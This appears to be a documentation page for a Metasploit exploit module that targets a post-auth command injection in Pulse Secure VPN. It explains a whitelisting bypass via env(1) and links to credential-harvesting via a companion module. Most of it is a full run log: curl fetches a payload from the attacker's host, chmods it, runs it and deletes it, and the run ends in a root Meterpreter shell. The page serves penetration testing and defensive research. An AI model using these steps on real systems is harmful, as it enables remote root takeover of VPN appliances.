adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
703dc797101fa4a2fed65e87cccbe13e9dbf2c57
metasploit-gs/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md
T

79 lines
3.2 KiB
Markdown
Raw Normal View History

Add module doc
2019-11-12 02:10:10 -06:00
## Introduction
This module exploits a post-auth command injection in the Pulse Secure
Code-block env(1)
2019-11-12 02:46:18 -06:00
VPN server to execute commands as root. The `env(1)` command is used to
Reference env(1) as the reason we have useful RCE
2019-11-12 02:17:58 -06:00
bypass application whitelisting and run arbitrary commands.
Add module doc
2019-11-12 02:10:10 -06:00
Please see related module `auxiliary/gather/pulse_secure_file_disclosure`
for a pre-auth file read that is able to obtain plaintext and hashed
credentials, plus session IDs that may be used with this exploit.
A valid administrator session ID is required in lieu of untested SSRF.
## Targets
```
Id Name
-- ----
0 Unix In-Memory
1 Linux Dropper
```
## Options
**SID**
Set this to a valid administrator session ID. Typically retrieved using
the `auxiliary/gather/pulse_secure_file_disclosure` module.
## Usage
```
msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf5 exploit(linux/http/pulse_secure_cmd_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress - 63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : [redacted]
OS : (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
Reference in New Issue Copy Permalink